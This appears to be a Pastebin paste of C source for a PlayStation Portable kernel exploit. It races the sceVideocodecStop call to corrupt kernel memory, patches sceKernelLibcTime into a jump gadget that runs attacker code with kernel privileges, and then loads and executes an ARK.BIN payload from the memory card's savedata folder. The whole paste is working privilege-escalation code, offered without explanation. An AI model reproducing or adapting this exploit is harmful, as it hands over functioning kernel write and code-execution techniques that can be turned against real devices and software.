Guest User

Untitled

a guest
Feb 21st, 2015
2,235
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include <pspkernel.h>
  2.  
  3. u32 sceMeCodecWrapper = 0x88136800, sw_address = 0;
  4. int is_exploited = 0, running = 1;
  5. u32 a0[24];
  6.  
  7. int storethread()
  8. {
  9.     while (running == 1) {
  10.         a0[11] = sw_address;
  11.         sceKernelDelayThread(1);
  12.     }
  13.  
  14.     sceKernelExitThread(0);
  15. }
  16.  
  17. void KernelContent()
  18. {
  19.     is_exploited = 1;
  20.  
  21.     __asm("move $k1, $0;");
  22.  
  23.     //"restore" me_wrapper mutex UID
  24.     SceUID (* _sceKernelCreateMutex)(const char *name, u32 attr, int init_count, void *options) = \
  25.         (void *)FindExport("sceThreadManager", "ThreadManForUser", 0xB7D098C6);
  26.  
  27.     SceUID mutex = _sceKernelCreateMutex("SceKermitMe", 256, 0, NULL);
  28.  
  29.     _sw(mutex, sceMeCodecWrapper + 0x2F80);
  30.  
  31.     //sceKernelLibcTime - pass address of kernel function in first arg, restored later in ARK code. |:
  32.     _sw(0x00800008, 0x8800F9C4);    //jr    $a0
  33.     _sw(0, 0x8800F9C8);     //nop
  34.  
  35.     void (* _sceKernelDcacheWritebackInvalidateAll)(void) = (void *)0x88000744;
  36.     void (* _sceKernelIcacheInvalidateAll)(void) = (void *)0x88000E98;
  37.  
  38.     _sceKernelDcacheWritebackInvalidateAll();
  39.     _sceKernelIcacheInvalidateAll();
  40. }
  41.  
  42. void do_exploit()
  43. {
  44.     is_exploited = 0;
  45.     running = 1;
  46.  
  47.     sw_address = (sceMeCodecWrapper + 0x2F80) - 36;
  48.  
  49.     SceUID thid = sceKernelCreateThread("thid", storethread, 8, 512, THREAD_ATTR_USER, NULL);
  50.     sceKernelStartThread(thid, 0, NULL);
  51.  
  52.     sceUtilityLoadModule(0x300);
  53.     sceUtilityLoadModule(0x303);
  54.  
  55.     int (* sceVideocodecStop)(u32 *a0, int a1) = (void *)FindImport("sceVideocodec", 0xA2F0564E, 0);
  56.  
  57.     memset(a0, 0, sizeof(a0));
  58.  
  59.     a0[0] = 0x05100601;
  60.     a0[15] = 1;
  61.  
  62.     int i;
  63.  
  64.     while (a0[2] != 0x800201C3) {
  65.         a0[15] = 1;
  66.         a0[3] = 0x09000000;
  67.         a0[4] = 0x09000000;
  68.         a0[2] = 0;
  69.         a0[11] = 0x09000000;
  70.  
  71.         sceVideocodecStop(a0, 0);
  72.     }
  73.  
  74.     fillvram(-1);
  75.  
  76.     sw_address = 0x8800F9C4 - 36;
  77.  
  78.     int (* _sceKernelLibcTime)(u32, u32) = (void *)sceKernelLibcTime;
  79.  
  80.     while (is_exploited != 1) {
  81.         a0[15] = 1;
  82.         a0[11] = 0x09000000;
  83.         a0[3] = 0x09000000;
  84.         a0[4] = 0x09000000;
  85.  
  86.         sceVideocodecStop(a0, 0);
  87.  
  88.         sceKernelDcacheWritebackAll();
  89.  
  90.         _sceKernelLibcTime(0x08800000, ((u32)&KernelContent | 0x80000000));
  91.     }
  92.  
  93.     fillvram(0xFF00);
  94.  
  95.     running = 0;
  96.  
  97.     u8 buf[0x4000];
  98.  
  99.     SceUID fd = sceIoOpen("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/ARK.BIN", PSP_O_RDONLY, 0777);
  100.     sceIoRead(fd, buf, sizeof(buf));
  101.     sceIoClose(fd);
  102.  
  103.     memcpy((void *)0x10000, buf, sizeof(buf));
  104.  
  105.     sceKernelDcacheWritebackAll();
  106.  
  107.     void (* Start)(const char *) = (void *)0x10000;
  108.     Start("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/");
  109. }
  110.  
  111. void _start() __attribute__ ((section (".text.start")));
  112. void _start()
  113. {
  114.     fillvram(0x80808080);
  115.     do_exploit();
  116.     sceKernelExitGame();
  117. }
RAW Paste Data